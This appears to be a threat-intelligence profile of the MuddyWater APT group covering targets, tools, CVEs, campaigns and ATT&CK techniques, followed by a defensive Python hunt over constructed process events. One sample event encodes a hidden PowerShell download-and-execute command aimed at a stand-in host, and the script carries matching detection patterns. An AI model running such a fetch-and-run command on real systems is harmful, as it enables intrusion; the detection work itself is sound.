Summary:
Keypoints:
- MuddyWater is affiliated with the Iranian government.
- Targets include Saudi Arabia, UAE, Iraq, and other Middle Eastern countries.
- Employs in-memory attack techniques, avoiding new binaries on victim machines.
- Recent campaigns have intensified against Israeli organizations.
- Utilizes phishing tactics to deploy legitimate remote management tools.
- Developed a custom malware implant called BugSleep for remote command execution.
MITRE Techniques
- Reconnaissance (T1589.002, Gather Victim Identity Information: Email Addresses): collects target email addresses ahead of phishing.
- Resource Development (T1583.006, Acquire Infrastructure: Web Services): stages infrastructure on legitimate web services for later operations.
- Initial Access (T1566.001, Phishing: Spearphishing Attachment): gains initial access through spear-phishing attachments.
- Execution (T1059.003, Command and Scripting Interpreter: Windows Command Shell): executes commands on compromised systems.
- Persistence (T1574.002, Hijack Execution Flow: DLL Side-Loading): maintains access by side-loading malicious DLLs next to legitimate executables.
- Discovery (T1082, System Information Discovery): enumerates system information on compromised hosts.
- Lateral Movement (T1210, Exploitation of Remote Services): moves laterally by exploiting services on other systems in the network.
- Defense Evasion (T1562.001, Impair Defenses: Disable or Modify Tools): disables or modifies security tooling to avoid detection.
- Credential Access (T1555, Credentials from Password Stores): steals credentials from password stores.
- Exfiltration (T1041, Exfiltration Over C2 Channel): exfiltrates data over the existing command-and-control channel.
MuddyWater is an APT group assessed to be affiliated with the Iranian government. It targets victims in the Middle East with in-memory techniques built on PowerShell, in the family of attacks now described as "living off the land": no new binaries are written to the victim's machine, which keeps both the detection profile and the forensic footprint low. The operators are most likely espionage-motivated. Although a large share of observed victims are in Pakistan, the most heavily targeted organizations appear to be in Saudi Arabia, the UAE, and Iraq.
Alias:
MERCURY, Seedworm, Static Kitten, TEMP.Zagros, Earth Vetala
Motivation:
Information theft and espionage
Target Technologies:
Office Suites Software, Operating System, Web Application
Targeted Industries:
Aerospace, Aerospace & Defense, Agriculture, Capital Goods, Consumer Services, Defense, Energy, Energy Equipment & Services, Finance, Food, Gaming, High Tech IT Service Providers, Individuals, Media, Media & Entertainment, Military, NGO, Natural Resources, Oil and Gas, Politics, Telecommunication, Telecommunication Services, Transportation, Construction, Cryptocurrency, Education, Engineering, Government, Healthcare, and Metals
Targeted Countries
Israel, Saudi Arabia, the United Arab Emirates, Iraq, Jordan, Lebanon, Qatar, Albania, Turkey, Austria, Ukraine, Russia, India, Azerbaijan, Pakistan, the United States of America, and Mali
Tools Used:
Secure Socket Funneling (SSF), Remadmin, Chisel, Quarks PwDump, PowGoop (also detected as Downloader.Covic), Mimikatz, POWERSTATS, Thanos ransomware
Recently Exploited Vulnerabilities by MUDDYWATER
- CVE-2017-0199 (Microsoft Office/WordPad OLE remote code execution)
- CVE-2017-11882 (Microsoft Office Equation Editor memory corruption)
- CVE-2017-0144 (Windows SMBv1 remote code execution, "EternalBlue")
- CVE-2020-1472 (Netlogon elevation of privilege, "Zerologon")
- CVE-2017-17215 (Huawei HG532 router remote code execution)
- CVE-2014-8361 (Realtek SDK miniigd UPnP SOAP command execution)
MUDDYWATER’s Recent Campaign Highlights and Trends
- In a recent campaign, MuddyWater is believed to have targeted organizations in Saudi Arabia, Turkey, Azerbaijan, India, and Portugal. The attackers used compromised organizational email accounts to send phishing messages whose main goal was to get legitimate remote management tools, chiefly Atera Agent and ScreenConnect, installed on the victim's machine. These phishing campaigns, ongoing since February 2024, focus on sectors including government bodies, municipalities, media outlets, and travel agencies. So far, over 50 spear-phishing emails have been identified across more than ten sectors, each customized to lure a specific target into granting remote access through legitimate software. Because the remote access runs through a signed, commercially supported agent rather than custom malware, it blends in with normal IT activity and gives MuddyWater persistent access with a low detection profile.
- Since October 2024, MuddyWater has intensified its operations against Israeli organizations as part of a broader campaign deploying a custom malware implant known as BugSleep. The backdoor gives MuddyWater remote command execution and file transfer between infected systems and a command-and-control server, a shift from the group's prior reliance on legitimate remote management tools like Atera Agent and ScreenConnect. BugSleep is still under development, with continuous updates aimed at improving its functionality and evasion capabilities.
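The two behaviours described above, in-memory PowerShell launched from a lure document and a phishing-delivered RMM installer, both leave a process-creation trail even when nothing malicious touches disk. The following is an added example written for this page, not code from the original post or from any vendor report: a small hunt over constructed Sysmon-style process-creation events. The field names, the installer file-name patterns for Atera Agent and ScreenConnect, and the list of "lure parent" processes are assumptions to be tuned against real telemetry.

```python
"""Added example (not from the original page): hunt constructed process-creation
events for (a) PowerShell that pulls script into memory, decoding -EncodedCommand
first, and (b) RMM agent installers launched from a mail client or Office app.
Field names loosely follow Sysmon Event ID 1; patterns and parent lists are
assumptions, not vendor-published indicators."""
import base64
import re

# Assumption: installer names typically seen for Atera Agent and ScreenConnect.
RMM_INSTALLER_PATTERNS = [re.compile(p, re.I) for p in (r"ateraagent", r"screenconnect")]

# Assumption: processes a phishing lure is opened with. PowerShell or an installer
# spawned by one of these is far rarer than one spawned by explorer.exe or an IT tool.
LURE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe",
                "chrome.exe", "msedge.exe", "firefox.exe"}

# Strings indicating script content is fetched or loaded without being written to disk.
IN_MEMORY_MARKERS = re.compile(
    r"invoke-expression|\biex\b|downloadstring|frombase64string|"
    r"reflection\.assembly|\[system\.io\.memorystream\]", re.I)

# -EncodedCommand and the abbreviations PowerShell accepts for it (-e, -ec, -en, -enc).
ENCODED_FLAG = re.compile(
    r"(?:^|\s)-(?:encodedcommand|enco|enc|en|ec|e)\s+([A-Za-z0-9+/=]+)", re.I)


def basename(path: str) -> str:
    """Lower-cased file name of a Windows or POSIX path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def decode_encoded_command(command_line: str):
    """Return the -EncodedCommand payload (base64 of UTF-16LE) as text, or None."""
    m = ENCODED_FLAG.search(command_line)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def analyse_event(event: dict) -> list:
    """Return finding tags for one process-creation event (empty list if clean)."""
    image = basename(event["image"])
    parent = basename(event["parent_image"])
    cmd = event["command_line"]
    findings = []

    if image in ("powershell.exe", "pwsh.exe"):
        decoded = decode_encoded_command(cmd)
        if decoded is not None:
            findings.append("ps_encoded_command")
        # Scan the decoded script as well; the IEX/DownloadString marker is usually only there.
        if IN_MEMORY_MARKERS.search(cmd + " " + (decoded or "")):
            findings.append("ps_in_memory_load")
        if parent in LURE_PARENTS:
            findings.append("ps_from_lure_parent")

    installer_image = image == "msiexec.exe" or any(p.search(image) for p in RMM_INSTALLER_PATTERNS)
    if installer_image and any(p.search(cmd) for p in RMM_INSTALLER_PATTERNS):
        findings.append("rmm_installer")  # low severity on its own: IT deploys these too
        if parent in LURE_PARENTS:
            findings.append("rmm_installer_from_lure_parent")
    return findings


def hunt(events) -> dict:
    """Map event index -> findings for every event that produced at least one tag."""
    return {i: f for i, ev in enumerate(events) if (f := analyse_event(ev))}


def encode_ps(script: str) -> str:
    """Build an -EncodedCommand argument exactly as PowerShell expects it."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


# Constructed sample events (not real telemetry).
SAMPLE_EVENTS = [
    {   # 0: an admin running a cmdlet from an interactive session: benign
        "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "parent_image": r"C:\Windows\explorer.exe",
        "command_line": "powershell.exe Get-Service -Name Spooler",
    },
    {   # 1: a macro document spawning hidden PowerShell that pulls a script into memory
        "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "parent_image": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
        "command_line": "powershell.exe -nop -w hidden -enc " + encode_ps(
            "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/s.ps1')"),
    },
    {   # 2: an RMM agent installed silently from an attachment opened in Outlook
        "image": r"C:\Windows\System32\msiexec.exe",
        "parent_image": r"C:\Program Files\Microsoft Office\root\Office16\OUTLOOK.EXE",
        "command_line": r"msiexec.exe /i C:\Users\u\AppData\Local\Temp\AteraAgent.msi /qn",
    },
    {   # 3: the same agent rolled out by the software-deployment service: expected
        "image": r"C:\Windows\System32\msiexec.exe",
        "parent_image": r"C:\Windows\CCM\CcmExec.exe",
        "command_line": r"msiexec.exe /i C:\Windows\ccmcache\1\AteraAgent.msi /qn",
    },
]

if __name__ == "__main__":
    for idx, tags in hunt(SAMPLE_EVENTS).items():
        print(idx, tags)
```

Event 3 shows why the installer match alone is a weak signal: the same MSI pushed by a deployment agent gets only `rmm_installer`, while the Outlook-spawned copy also gets `rmm_installer_from_lure_parent`. Score on the parent-process tags, and keep the bare installer tag for allow-listing against your own RMM inventory.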
Malware used by MUDDYWATER: POWERSTATS
MITRE ATT&CK Techniques used by MUDDYWATER
Reconnaissance
- T1589.002 Gather Victim Identity Information: Email Addresses
Resource Development
- T1583.006 Acquire Infrastructure: Web Services
- T1588.002 Obtain Capabilities: Tool
Initial Access
- T1566.001 Phishing: Spearphishing Attachment
- T1566.002 Phishing: Spearphishing Link
- T1190 Exploit Public-Facing Application
Execution
- T1203 Exploitation for Client Execution
- T1047 Windows Management Instrumentation
- T1059.001 Command and Scripting Interpreter: PowerShell
- T1059.003 Command and Scripting Interpreter: Windows Command Shell
- T1059.005 Command and Scripting Interpreter: Visual Basic
- T1059.006 Command and Scripting Interpreter: Python
- T1059.007 Command and Scripting Interpreter: JavaScript
- T1053.005 Scheduled Task/Job: Scheduled Task
- T1204.001 User Execution: Malicious Link
- T1204.002 User Execution: Malicious File
- T1559.001 Inter-Process Communication: Component Object Model
- T1559.002 Inter-Process Communication: Dynamic Data Exchange
Persistence
- T1053.005 Scheduled Task/Job: Scheduled Task
- T1137.001 Office Application Startup: Office Template Macros
- T1574.002 Hijack Execution Flow: DLL Side-Loading
- T1547.001 Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder
Privilege Escalation
- T1548.002 Abuse Elevation Control Mechanism: Bypass User Account Control
- T1053.005 Scheduled Task/Job: Scheduled Task
- T1574.002 Hijack Execution Flow: DLL Side-Loading
- T1547.001 Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder
Defense Evasion
- T1548.002 Abuse Elevation Control Mechanism: Bypass User Account Control
- T1218.003 System Binary Proxy Execution: CMSTP
- T1218.005 System Binary Proxy Execution: Mshta
- T1218.011 System Binary Proxy Execution: Rundll32
- T1027 Obfuscated Files or Information
- T1027.003 Obfuscated Files or Information: Steganography
- T1027.004 Obfuscated Files or Information: Compile After Delivery
- T1140 Deobfuscate/Decode Files or Information
- T1562.001 Impair Defenses: Disable or Modify Tools
- T1036.005 Masquerading: Match Legitimate Name or Location
- T1574.002 Hijack Execution Flow: DLL Side-Loading
Credential Access
- T1555 Credentials from Password Stores
- T1555.003 Credentials from Password Stores: Credentials from Web Browsers
- T1552.001 Unsecured Credentials: Credentials In Files
- T1003.001 OS Credential Dumping: LSASS Memory
- T1003.004 OS Credential Dumping: LSA Secrets
- T1003.005 OS Credential Dumping: Cached Domain Credentials
Discovery
- T1087.002 Account Discovery: Domain Account
- T1518 Software Discovery
- T1518.001 Software Discovery: Security Software Discovery
- T1049 System Network Connections Discovery
- T1016 System Network Configuration Discovery
- T1057 Process Discovery
- T1033 System Owner/User Discovery
- T1082 System Information Discovery
- T1083 File and Directory Discovery
Lateral Movement
- T1210 Exploitation of Remote Services
Collection
- T1113 Screen Capture
- T1074.001 Data Staged: Local Data Staging
- T1560.001 Archive Collected Data: Archive via Utility
Command and Control
- T1071.001 Application Layer Protocol: Web Protocols
- T1573.001 Encrypted Channel: Symmetric Cryptography
- T1104 Multi-Stage Channels
- T1102.002 Web Service: Bidirectional Communication
- T1132.001 Data Encoding: Standard Encoding
- T1219 Remote Access Software
- T1090.002 Proxy: External Proxy
- T1105 Ingress Tool Transfer
Exfiltration
- T1041 Exfiltration Over C2 Channel
Source: Original Post